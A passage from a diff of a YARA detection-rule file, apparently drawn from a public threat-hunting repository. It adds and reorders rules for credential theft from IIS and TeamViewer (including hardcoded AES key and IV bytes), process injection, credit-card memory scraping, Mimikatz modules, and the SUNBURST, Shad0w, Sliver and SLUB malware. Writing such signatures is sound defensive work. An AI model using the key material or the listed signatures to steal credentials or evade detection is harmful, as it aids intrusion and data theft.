+		logic_hash = "130a0292b16e934311597d4f91456e6a605477e306a7b1d8171cc4e13794db31"
+		score = 65
+		quality = 75
+		tags = "FILE"
+
+	strings:
+		$inj1 = "WriteProcessMemory"
+		$inj2 = "NtWriteVirtualMemory"
+		$inj3 = "RtlMoveMemory"
+		$inj4 = "VirtualAllocEx"
+		$inj5 = "NtAllocateVirtualMemory"
+		$inj6 = "NtUnmapViewOfSection"
+		$inj7 = "VirtualProtect"
+		$inj8 = "NtProtectVirtualMemory"
+		$inj9 = "SetThreadContext"
+		$inj10 = "NtSetContextThread"
+		$inj11 = "ResumeThread"
+		$inj12 = "NtResumeThread"
+		$inj13 = "QueueUserAPC"
+		$inj14 = "NtQueueApcThread"
+		$inj15 = "NtQueueApcThreadEx"
+		$inj16 = "CreateRemoteThread"
+		$inj17 = "NtCreateThreadEx"
+		$inj18 = "RtlCreateUserThread"
+
+	condition:
+		uint16( 0 ) == 0x5a4d and ( pe.exports ( "wdAutoOpen" ) or pe.exports ( "xlAutoOpen" ) ) and 3 of ( $inj* )
+}
 rule SBOUSSEADEN_Mem_Webcreds_Regexp_Xor
 {
 	meta:
@@ -165217,237 +166008,144 @@ rule SBOUSSEADEN_Hunt_Credaccess_Iis_Wide_Base64
 		tags = ""
 
 	strings:
-		$a1 = "aspnet_regiis.exe" wide base64
-		$a2 = "connectionStrings" wide base64
-		$a3 = "web.config" wide base64
-		$a4 = "-pdf" wide base64
-		$b1 = "appcmd.exe" wide base64
-		$b2 = "/text:password" wide base64
-
-	condition:
-		(3 of ( $a* ) or all of ( $b* ) )
-}
-rule SBOUSSEADEN_Hunt_Teamviewer_Registry_Pwddump : CVE_2019_18988 FILE
-{
-	meta:
-		description = "cve-2019-18988 - decryption of AES 128 bits encrypted TV config pwds saved in TV registry hive"
-		author = "SBousseaden"
-		id = "b2240cda-a37a-572e-b915-be39cbaabaaf"
-		date = "2020-07-23"
-		modified = "2020-12-28"
-		reference = "https://community.teamviewer.com/t5/Announcements/Specification-on-CVE-2019-18988/td-p/82264"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_capab_credentials_access.yara#L266-L286"
-		license_url = "N/A"
-		logic_hash = "a0cb06e06904e98e963798fddc28e2a7cf8b737a50ff7d380e7f871c78ed9479"
-		score = 50
-		quality = 63
-		tags = "CVE-2019-18988, FILE"
-
-	strings:
-		$key1 = {0602000000a400005253413100040000}
-		$key2 = "\\x06\\x02\\x00\\x00\\x00\\xa4\\x00\\x00\\x52\\x53\\x41\\x31\\x00\\x04\\x00\\x00"
-		$iv1 = {0100010067244F436E6762F25EA8D704}
-		$iv2 = "\\x01\\x00\\x01\\x00\\x67\\x24\\x4F\\x43\\x6E\\x67\\x62\\xF2\\x5E\\xA8\\xD7\\x04"
-		$p1 = "OptionsPasswordAES" nocase
-		$p2 = "OptionsPasswordAES" nocase wide
-		$p3 = "ProxyPasswordAES" nocase
-		$p4 = "ProxyPasswordAES" nocase wide
-		$p5 = "PermanentPassword" nocase
-		$p6 = "PermanentPassword" nocase wide
-
-	condition:
-		any of ( $key* ) and any of ( $iv* ) and 2 of ( $p* ) and filesize < 700KB
-}
-rule SBOUSSEADEN_APT_Solarwind_Backdoor_Encoded_Strings : FILE
-{
-	meta:
-		description = "This rule is looking for some key encoded strings of the SUNBURST backdoor"
-		author = "SBousseaden"
-		id = "04a63bd6-9737-568f-a20e-c573b915cbd4"
-		date = "2020-12-14"
-		modified = "2020-12-18"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/apt_solarwinds_backdoor_encoded_strings.yara#L1-L28"
-		license_url = "N/A"
-		hash = "846e27a652a5e1bfbd0ddd38a16dc865"
-		logic_hash = "8808cca8d89f089a8bca5ef62c1764061c8210ba5f9813c886d6ed9f79579ba6"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		sha2 = "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6"
-
-	strings:
-		$sw = "SolarWinds"
-		$priv1 = "C04NScxO9S/PSy0qzsgsCCjKLMvMSU1PBQA=" wide
-		$priv2 = "C04NzigtSckvzwsoyizLzElNTwUA" wide
-		$priv3 = "C04NSi0uyS9KDSjKLMvMSU1PBQA=" wide
-		$disc1 = "C0gsSs0rCSjKT04tLvZ0AQA=" wide
-		$disc2 = "c0zJzczLLC4pSizJLwIA" wide
-		$disc3 = "c/ELdsnPTczMCy5NS8usCE5NLErO8C9KSS0CAA==" wide
-		$wmi1 = "C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA==" wide
-		$wmi2 = "C07NSU0uUdBScCvKz1UIz8wzNooPKMpPTi0uBgA=" wide
-		$wmi3 = "C07NSU0uUdBScCvKz1UIz8wzNooPLU4tckxOzi/NKwEA" wide
-		$wmi4 = "C07NSU0uUdBScCvKz1UIz8wzNor3Sy0pzy/KdkxJLChJLXLOz0vLTC8tSizJzM9TKM9ILUpV8AxwzUtMyklNsS0pKk0FAA=="
-		$key1 = "C44MDnH1jXEuLSpKzStxzs8rKcrPCU4tiSlOLSrLTE4tBgA=" wide
-		$key2 = "Cy5JLCoBAA==" wide
-		$pat1 = "i6420DGtjVWoNqzlAgA=" wide
-		$pat2 = "i6420DGtjVWoNtTRNTSrVag2quWsNgYKKVSb1MZUm9ZyAQA=" wide
-		$pat3 = "qzaoVag2rFXwCAkJ0K82quUCAA==" wide
-		$pat4 = {9D 2A 9A F3 27 D6 F8 EF}
-
-	condition:
-		uint16( 0 ) == 0x5a4d and $sw and ( 2 of ( $pat* ) or 2 of ( $priv* ) or all of ( $disc* ) or 2 of ( $wmi* ) or all of ( $key* ) )
-}
-rule SBOUSSEADEN_Shad0W_Beacon_16June : FILE
-{
-	meta:
-		description = "Shad0w beacon compressed"
-		author = "SBousseaden"
-		id = "1229e84f-bf6e-5e87-9351-a48cd50397b0"
-		date = "2020-06-16"
-		modified = "2020-06-17"
-		reference = "https://github.com/bats3c/shad0w"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/shad0w_beacon_16June.yara#L1-L13"
-		license_url = "N/A"
-		logic_hash = "c313e995d6eaae6d2ee63964f6fc94964065af7a61d7f304280d914e6f0dd548"
-		score = 75
-		quality = 75
-		tags = "FILE"
-
-	strings:
-		$s1 = {F2 AE ?? ?? ?? FF 15 ?? ?? 00 00 48 09 C0 74 09}
-		$s2 = {33 2E 39 36 00 ?? ?? ?? 21 0D 24 0E 0A}
-		$s3 = "VirtualProtect"
-		$s4 = "GetProcAddress"
+		$a1 = "aspnet_regiis.exe" wide base64
+		$a2 = "connectionStrings" wide base64
+		$a3 = "web.config" wide base64
+		$a4 = "-pdf" wide base64
+		$b1 = "appcmd.exe" wide base64
+		$b2 = "/text:password" wide base64
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* )
+		(3 of ( $a* ) or all of ( $b* ) )
 }
-
-rule SBOUSSEADEN_Susp_Msoffice_Addins_Wxll : FILE
+rule SBOUSSEADEN_Hunt_Teamviewer_Registry_Pwddump : CVE_2019_18988 FILE
 {
 	meta:
-		description = "hunt for suspicious MS Office Addins with code injection capabilities"
+		description = "cve-2019-18988 - decryption of AES 128 bits encrypted TV config pwds saved in TV registry hive"
 		author = "SBousseaden"
-		id = "39d3b2af-f848-51c0-a13b-13c0fe3a79dd"
-		date = "2020-11-10"
-		modified = "2023-03-27"
-		reference = "https://twitter.com/JohnLaTwC/status/1315287078855352326"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_susp_msoffice_addins_wxll.yara#L3-L29"
+		id = "b2240cda-a37a-572e-b915-be39cbaabaaf"
+		date = "2020-07-23"
+		modified = "2020-12-28"
+		reference = "https://community.teamviewer.com/t5/Announcements/Specification-on-CVE-2019-18988/td-p/82264"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_capab_credentials_access.yara#L266-L286"
 		license_url = "N/A"
-		logic_hash = "130a0292b16e934311597d4f91456e6a605477e306a7b1d8171cc4e13794db31"
-		score = 65
-		quality = 75
-		tags = "FILE"
+		logic_hash = "a0cb06e06904e98e963798fddc28e2a7cf8b737a50ff7d380e7f871c78ed9479"
+		score = 50
+		quality = 63
+		tags = "CVE-2019-18988, FILE"
 
 	strings:
-		$inj1 = "WriteProcessMemory"
-		$inj2 = "NtWriteVirtualMemory"
-		$inj3 = "RtlMoveMemory"
-		$inj4 = "VirtualAllocEx"
-		$inj5 = "NtAllocateVirtualMemory"
-		$inj6 = "NtUnmapViewOfSection"
-		$inj7 = "VirtualProtect"
-		$inj8 = "NtProtectVirtualMemory"
-		$inj9 = "SetThreadContext"
-		$inj10 = "NtSetContextThread"
-		$inj11 = "ResumeThread"
-		$inj12 = "NtResumeThread"
-		$inj13 = "QueueUserAPC"
-		$inj14 = "NtQueueApcThread"
-		$inj15 = "NtQueueApcThreadEx"
-		$inj16 = "CreateRemoteThread"
-		$inj17 = "NtCreateThreadEx"
-		$inj18 = "RtlCreateUserThread"
+		$key1 = {0602000000a400005253413100040000}
+		$key2 = "\\x06\\x02\\x00\\x00\\x00\\xa4\\x00\\x00\\x52\\x53\\x41\\x31\\x00\\x04\\x00\\x00"
+		$iv1 = {0100010067244F436E6762F25EA8D704}
+		$iv2 = "\\x01\\x00\\x01\\x00\\x67\\x24\\x4F\\x43\\x6E\\x67\\x62\\xF2\\x5E\\xA8\\xD7\\x04"
+		$p1 = "OptionsPasswordAES" nocase
+		$p2 = "OptionsPasswordAES" nocase wide
+		$p3 = "ProxyPasswordAES" nocase
+		$p4 = "ProxyPasswordAES" nocase wide
+		$p5 = "PermanentPassword" nocase
+		$p6 = "PermanentPassword" nocase wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( pe.exports ( "wdAutoOpen" ) or pe.exports ( "xlAutoOpen" ) ) and 3 of ( $inj* )
+		any of ( $key* ) and any of ( $iv* ) and 2 of ( $p* ) and filesize < 700KB
 }
-rule SBOUSSEADEN_Hunt_Procinj_Instrumentationcallback : FILE
+rule SBOUSSEADEN_Hunt_Common_Credit_Card_Memscrapper : FILE
 {
 	meta:
-		description = "hunt for possible injection with Instrumentation Callback PE"
+		description = "Hunting rule for possible CC data memory scrapper"
 		author = "SBousseaden"
-		id = "f450bf71-d848-540e-b700-c046662f1cbc"
-		date = "2020-07-25"
-		modified = "2020-07-25"
-		reference = "https://movaxbx.ru/2020/07/24/weaponizing-mapping-injection-with-instrumentation-callback-for-stealthier-process-injection/"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_procinj_instrcallback.yara#L1-L21"
+		id = "f342535f-2236-5da0-8a4d-d7fecb7737b8"
+		date = "2020-07-17"
+		modified = "2020-07-18"
+		reference = "https://github.com/sbousseaden/YaraHunts/"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_creditcard_memscrap.yara#L1-L28"
 		license_url = "N/A"
-		logic_hash = "b33dae550bae9508b9fd5b2d6cabf1d4d928792d3988af23cdba34d9d3d03162"
+		logic_hash = "983cc0c93dd19b32f729540dcc691b3a01ead8ed916e3ef5259456f5e25bd009"
 		score = 50
-		quality = 71
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$mv1 = "MapViewOfFile3" xor
-		$mv2 = "MapViewOfFile3" wide xor
-		$mv3 = "NtMapViewOfSectionEx" xor
-		$mv4 = "NtMapViewOfSectionEx" wide xor
-		$mv5 = {(49 89 CA|4C 8B D1) B8 0F 01 00 00 0F 05 C3}
-		$spi1 = "NtSetInformationProcess" xor
-		$spi2 = "NtSetInformationProcess" wide xor
-		$spi3 = {(49 89 CA|4C 8B D1) B8 1C 00 00 00 0F 05 C3}
-		$picb = {BA 28 00 00 00}
-		$ss1 = {41 52 50 53 55 57 56 54 41 54 41 55 41 56 41 57}
-		$ss2 = {41 5F 41 5E 41 5D 41 5C 5C 5E 5F 5D 5B 58 41 5A}
-		$ss3 = {49 89 CA 0F 05 C3}
+		$api1 = "NtOpenProcess"
+		$api2 = "NtQueryVirtualMemory"
+		$api3 = "NtReadVirtualMemory"
+		$cc1 = "^3[47][0-9]{13}$"
+		$cc2 = "^(6541|6556)[0-9]{12}$"
+		$cc3 = "^389[0-9]{11}$"
+		$cc4 = "^3(?:0[0-5]|[68][0-9])[0-9]{11}$"
+		$cc5 = "^65[4-9][0-9]{13}|64[4-9][0-9]{13}|6011[0-9]{12}|(622(?:12[6-9]|1[3-9][0-9]|[2-8][0-9][0-9]|9[01][0-9]|92[0-5])[0-9]{10})$"
+		$cc6 = "^63[7-9][0-9]{13}$"
+		$cc7 = "^(?:2131|1800|35\\d{3})\\d{11}$"
+		$cc8 = "^9[0-9]{15}$"
+		$cc9 = "^(6304|6706|6709|6771)[0-9]{12,15}$"
+		$cc10 = "^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$"
+		$cc11 = "^(5[1-5][0-9]{14}|2(22[1-9][0-9]{12}|2[3-9][0-9]{13}|[3-6][0-9]{14}|7[0-1][0-9]{13}|720[0-9]{12}))$"
+		$cc12 = "^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$"
+		$cc13 = "^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$"
+		$cc14 = "^(62[0-9]{14,17})$"
+		$cc15 = "^4[0-9]{12}(?:[0-9]{3})?$"
+		$cc16 = "^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $picb and 1 of ( $mv* ) and 1 of ( $spi* ) and 1 of ( $ss* )
+		uint16( 0 ) == 0x5a4d and 1 of ( $cc* ) and all of ( $api* )
 }
-
-rule SBOUSSEADEN_Maliciousdllgenerator : FILE
+rule SBOUSSEADEN_Mimikatz_Kiwikey
 {
 	meta:
-		description = "MaliciousDLLGenerator default decoder and export name"
+		description = "hunt for default mimikatz kiwikey"
 		author = "SBousseaden"
-		id = "a5f4d0b2-ef40-5e69-935e-208464944487"
-		date = "2020-06-07"
-		modified = "2020-06-08"
-		reference = "https://github.com/Mr-Un1k0d3r/MaliciousDLLGenerator"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/MaliciousDLLGenerator.yara#L3-L12"
+		id = "3141e679-6e07-5017-9675-4557fb876ebc"
+		date = "2020-08-08"
+		modified = "2020-08-09"
+		reference = "https://github.com/sbousseaden/YaraHunts/"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/kiwikey.yara#L1-L10"
 		license_url = "N/A"
-		logic_hash = "70976f4a7043f52277a1d436c1725b2583383880d7158c74c4d93f3e603708c7"
+		logic_hash = "03745aed838dafad2fc6e190f181141bda31c212af56edb8ba665b86671f8bee"
 		score = 75
 		quality = 75
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$decoder = {E8 00 00 00 00 5B 48 31 C0 48 89 C1 B1 80 48 83 C3 11 48 F7 14 CB E2 FA 48 83 C3 08 53 C3}
+		$A = {60 BA 4F CA C7 44 24 ?? DC 46 6C 7A C7 44 24 ?? 03 3C 17 81 C7 44 24 ?? 94 C0 3D F6}
+		$B = {48 B8 ?? ?? ?? ?? ?? ?? ?? ?? FF D0}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $decoder and pe.exports ( "Init" ) and pe.number_of_exports == 2
+		$A and #B > 10
 }
-rule SBOUSSEADEN_Zerlologon_Mimikatz : FILE
+rule SBOUSSEADEN_Hunt_Slub_Backdoor : FILE
 {
 	meta:
-		description = "Generic Hunting rule for Mimikatz Implementation of ZeroLogon PrivEsc Exploit"
+		description = "No description has been set in the source file - SBousseaden"
 		author = "SBousseaden"
-		id = "0fd32f14-d82d-5af4-b4a2-b21e2325ade8"
-		date = "2020-09-17"
-		modified = "2020-09-17"
-		reference = "https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_mimikatz_zerologon.yar#L1-L19"
+		id = "c15d5f14-d17f-528b-bf85-e06a5e23518c"
+		date = "2020-10-22"
+		modified = "2020-10-22"
+		reference = "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/APT_SLUB_Backdoor.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "5b8d618e8e680acd4e5a9def4e3b56617080dec0c5787c3d6f948489346a6888"
+		hash = "93bb93d87cedb0a99976c18a37d65f816dc904942a0fb39cc177d49372ed54e5"
+		hash = "59e4510b7b15011d67eb2f80484589f7211e67756906a87ce466a7bb68f2095b"
+		hash = "c7788c015244e12e4c8cc69a2b1344d589284c84102c2f1871bbb4f4c32c2936"
+		hash = "6678a5964db74d477b39bd0a8c18adf02844bed8b112c7bcca6984032918bdfb"
+		logic_hash = "aa17dcfde1e2227ff04bda708d4c40c1e1f07b404d2c43582632d83c98d65e83"
 		score = 50
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$rch1 = "NetrServerReqChallenge"
-		$rch2 = "NetrServerReqChallenge" wide
-		$auth1 = "NetrServerAuthenticate2"
-		$auth2 = "NetrServerAuthenticate2" wide
-		$pwd1 = "NetrServerPasswordSet2"
-		$pwd2 = "NetrServerPasswordSet2" wide
-		$rpc1 = {78 56 34 12 34 12 CD AB EF 00 01 23 45 67 CF FB}
-		$rpc2 = {00 00 12 08 25 5C 11 08 25 5C 11 00 08 00 1D 00 08 00 02 5B 15 00 08 00 4C 00 F4 FF 5C 5B 11 04 F4 FF 11 08 08 5C 11 00 02 00 15 03 0C 00 4C 00 E4 FF 08 5B 11 04 F4 FF 11 00 08 00 1D 01 00 02 05 5B 15 03 04 02 4C 00 F4 FF 08 5B 11 04 0C 00 1D 00 10 00 4C 00 BE FF 5C 5B 15 00 10 00 4C 00 F0 FF 5C 5B 00}
-		$rpc3 = {00 48 00 00 00 00 04 00 28 00 31 08 00 00 00 5C 3C 00 44 00 46 05 0A 01 00 00 00 00 00 00 00 00 0B 00 00 00 02 00 0B 01 08 00 08 00 0A 01 10 00 14 00 12 21 18 00 14 00 70 00 20 00 08 00 00 48 00 00 00 00 0F 00 40 00 31 08 00 00 00 5C 5E 00 60 00 46 08 0A 01 00 00 00 00 00 00 00 00 0B 00 00 00 02 00 0B 01 08 00 08 00 48 00 10 00 0D 00 0B 01 18 00 08 00 0A 01 20 00 14 00 12 21 28 00 14 00 58 01 30 00 08 00 70 00 38 00 08 00 00 48 00 00 00 00 1E 00 40 00 31 08 00 00 00 5C 8E 02 58 00 46 08 0A 01 00 00 00 00 00 00 00 00 0B 00 00 00 02 00 0B 01 08 00 08 00 48 00 10 00 0D 00 0B 01 18 00 08 00 0A 01 20 00 2A 00 12 41 28 00 2A 00 0A 01 30 00 42 00 70 00 38 00 08 00 00 48 00 00 00 00 2A 00 48 00 31 08 00 00 00 5C 56 00 40 01 46 09 0A 01 00 00 00 00 00 00 00 00 0B 00 00 00 02 00 0B 01 08 00 08 00 48 00 10 00 0D 00 0B 01 18 00 08 00 0A 01 20 00 2A 00 12 41 28 00 2A 00 12 41 30 00 5A 00 12 41 38 00 5A 00 70 00 40 00 08 00 00 00}
+		$s1 = "file_infos" ascii wide
+		$s2 = "%ws\\%u_cmd_out.tmp" ascii wide
+		$s3 = "%ws\\%u_cmd_out.zip" ascii wide
+		$s4 = "[was netstat]" ascii wide
+		$s5 = {63 3A 5C 77 6F 72 6B 2E 76 63 70 6B 67 5C 69 6E 73 74 61 6C 6C 65 64 5C 78 36 34 2D 77 69 6E 64 6F 77 73 2D 73 74 61 74 69 63 5C}
+		$s6 = "LoadFileToMemory" ascii wide
+		$s7 = "setStartupExec" ascii wide
+		$s8 = "%04u-%02u-%02u %02u:%02u:%02u" ascii wide
+		$s9 = "goto del_one" ascii wide
+		$s10 = "goto del_two" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $rch* ) and 1 of ( $auth* ) and 1 of ( $pwd* ) ) and 2 of ( $rpc* )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
 rule SBOUSSEADEN_Dcsync_Mimikatz : FILE
 {
@@ -165485,65 +166183,73 @@ rule SBOUSSEADEN_Dcsync_Mimikatz : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and ( all of ( $DRS* ) or all of ( $DRSW* ) ) and all of ( $rpc* ) and not ( any of ( $def* ) )
 }
-rule SBOUSSEADEN_Infinityhook : FILE
+
+rule SBOUSSEADEN_Maliciousdllgenerator : FILE
 {
 	meta:
-		description = "Infinityhook is a legit research PoC to hook NT Syscalls bypassing PatchGuard"
+		description = "MaliciousDLLGenerator default decoder and export name"
 		author = "SBousseaden"
-		id = "82f4eef2-fca7-58b1-a85c-3c237f523740"
-		date = "2020-09-07"
-		modified = "2020-07-10"
-		reference = "https://github.com/everdox/InfinityHook"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/infinityhook.yara#L1-L17"
+		id = "a5f4d0b2-ef40-5e69-935e-208464944487"
+		date = "2020-06-07"
+		modified = "2020-06-08"
+		reference = "https://github.com/Mr-Un1k0d3r/MaliciousDLLGenerator"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/MaliciousDLLGenerator.yara#L3-L12"
 		license_url = "N/A"
-		logic_hash = "c621ce3be8049de7584af73ca4472df5561d3c4ac8b458937db2ad68fdcbe2d8"
+		logic_hash = "70976f4a7043f52277a1d436c1725b2583383880d7158c74c4d93f3e603708c7"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$EtwpDebuggerPattern = {00 2C 08 04 38 0C 00}
-		$SMV = {00 00 76 66 81 3A 02 18 50 00 75 0E 48 83 EA 08 B8 33 0F 00}
-		$KVASCODE = {4B 56 41 53 43 4F 44 45}
-		$CKL = "Circular Kernel Context Logger" wide nocase
+		$decoder = {E8 00 00 00 00 5B 48 31 C0 48 89 C1 B1 80 48 83 C3 11 48 F7 14 CB E2 FA 48 83 C3 08 53 C3}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and $decoder and pe.exports ( "Init" ) and pe.number_of_exports == 2
 }
-rule SBOUSSEADEN_Mimikatz_Memssp_Hookfn
+
+rule SBOUSSEADEN_Hunt_Dllhijack_Wow64Log : FILE
 {
 	meta:
-		description = "hunt for default mimikatz memssp module both ondisk and in memory artifacts"
+		description = "broad hunt for non MS wow64log module"
 		author = "SBousseaden"
-		id = "845827b1-acd4-53af-97fb-43a4fe355fbf"
-		date = "2020-08-26"
-		modified = "2020-08-26"
-		reference = "https://github.com/sbousseaden/YaraHunts/"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/mimikatz_memssp_hookfn.yara#L1-L22"
+		id = "1d01917f-0690-5ede-947a-90fc86c03c38"
+		date = "2020-06-05"
+		modified = "2020-06-05"
+		reference = "http://waleedassar.blogspot.com/2013/01/wow64logdll.html"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/wow64log.yara#L3-L13"
 		license_url = "N/A"
-		logic_hash = "f63f3de05dd4f4f40cda6df67b75e37d7baa82c4b4cafd3ebdca35adfb0b15f8"
+		logic_hash = "e8ec491fe579b7e57b7e9078515a9628cfc2e0f3645882b9a352ff28a2fcb817"
+		score = 50
+		quality = 75
+		tags = "FILE"
+
+	condition:
+		uint16( 0 ) == 0x5a4d and ( pe.exports ( "Wow64LogInitialize" ) or pe.exports ( "Wow64LogMessageArgList" ) or pe.exports ( "Wow64LogSystemService" ) or pe.exports ( "Wow64LogTerminate" ) )
+}
+rule SBOUSSEADEN_Shad0W_Ldrloaddll_Hook : FILE
+{
+	meta:
+		description = "Shad0w beacon LdrLoadDll hook"
+		author = "SBousseaden"
+		id = "f9f75b96-2341-553f-b6ca-28d6cb9b880a"
+		date = "2020-06-06"
+		modified = "2020-06-07"
+		reference = "https://github.com/bats3c/shad0w"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/shad0w_ldrhook.yara#L1-L13"
+		license_url = "N/A"
+		logic_hash = "28e8ca9eee2377fd816dd3bd29e05f4146cea975e0ba5ec180073e10a49895e0"
 		score = 75
 		quality = 75
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = {44 30 00 38 00}
-		$s2 = {48 78 00 3A 00}
-		$s3 = {4C 25 00 30 00}
-		$s4 = {50 38 00 78 00}
-		$s5 = {54 5D 00 20 00}
-		$s6 = {58 25 00 77 00}
-		$s7 = {5C 5A 00 5C 00}
-		$s8 = {60 25 00 77 00}
-		$s9 = {64 5A 00 09 00}
-		$s10 = {6C 5A 00 0A 00}
-		$s11 = {68 25 00 77 00}
-		$s12 = {68 25 00 77 00}
-		$s13 = {6C 5A 00 0A 00}
-		$B = {6D 69 6D 69 C7 84 24 8C 00 00 00 6C 73 61 2E C7 84 24 90 00 00 00 6C 6F 67}
+		$s1 = "LdrLoadD"
+		$s2 = "SetPr"
+		$s3 = "Policy"
+		$s4 = {B8 49 BB DE AD C0}
 
 	condition:
-		all of ( $s* ) or $B
+		uint16( 0 ) == 0x5a4d and all of ( $s* )
 }
 rule SBOUSSEADEN_Hunt_Evtmutehook_Memory
 {
@@ -165592,6 +166298,41 @@ rule SBOUSSEADEN_APT_Xdsspy_Xdupload : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and 2 of ( $s* )
 }
+rule SBOUSSEADEN_Mimikatz_Memssp_Hookfn
+{
+	meta:
+		description = "hunt for default mimikatz memssp module both ondisk and in memory artifacts"
+		author = "SBousseaden"
+		id = "845827b1-acd4-53af-97fb-43a4fe355fbf"
+		date = "2020-08-26"
+		modified = "2020-08-26"
+		reference = "https://github.com/sbousseaden/YaraHunts/"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/mimikatz_memssp_hookfn.yara#L1-L22"
+		license_url = "N/A"
+		logic_hash = "f63f3de05dd4f4f40cda6df67b75e37d7baa82c4b4cafd3ebdca35adfb0b15f8"
+		score = 75
+		quality = 75
+		tags = ""
+
+	strings:
+		$s1 = {44 30 00 38 00}
+		$s2 = {48 78 00 3A 00}
+		$s3 = {4C 25 00 30 00}
+		$s4 = {50 38 00 78 00}
+		$s5 = {54 5D 00 20 00}
+		$s6 = {58 25 00 77 00}
+		$s7 = {5C 5A 00 5C 00}
+		$s8 = {60 25 00 77 00}
+		$s9 = {64 5A 00 09 00}
+		$s10 = {6C 5A 00 0A 00}
+		$s11 = {68 25 00 77 00}
+		$s12 = {68 25 00 77 00}
+		$s13 = {6C 5A 00 0A 00}
+		$B = {6D 69 6D 69 C7 84 24 8C 00 00 00 6C 73 61 2E C7 84 24 90 00 00 00 6C 6F 67}
+
+	condition:
+		all of ( $s* ) or $B
+}
 rule SBOUSSEADEN_Cve_2019_1458 : FILE
 {
 	meta:
@@ -165628,305 +166369,292 @@ rule SBOUSSEADEN_Cve_2019_1458 : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule SBOUSSEADEN_Gosliver
+rule SBOUSSEADEN_Infinityhook : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SBousseaden"
+		description = "Infinityhook is a legit research PoC to hook NT Syscalls bypassing PatchGuard"
 		author = "SBousseaden"
-		id = "eba5043a-ca4d-5c5d-a895-51218b03e59e"
-		date = "2020-10-11"
-		modified = "2020-10-11"
-		reference = "https://github.com/BishopFox/sliver"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_sliver_go_framwwork.yara#L2-L9"
+		id = "82f4eef2-fca7-58b1-a85c-3c237f523740"
+		date = "2020-09-07"
+		modified = "2020-07-10"
+		reference = "https://github.com/everdox/InfinityHook"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/infinityhook.yara#L1-L17"
 		license_url = "N/A"
-		logic_hash = "8dc96e533adc29c78a998d9f064ff294d2ef8a4ff00cef8b0c81ef465ef70b08"
+		logic_hash = "c621ce3be8049de7584af73ca4472df5561d3c4ac8b458937db2ad68fdcbe2d8"
 		score = 75
-		quality = 75
-		tags = ""
+		quality = 73
+		tags = "FILE"
 
 	strings:
-		$go = "_cgo_"
+		$EtwpDebuggerPattern = {00 2C 08 04 38 0C 00}
+		$SMV = {00 00 76 66 81 3A 02 18 50 00 75 0E 48 83 EA 08 B8 33 0F 00}
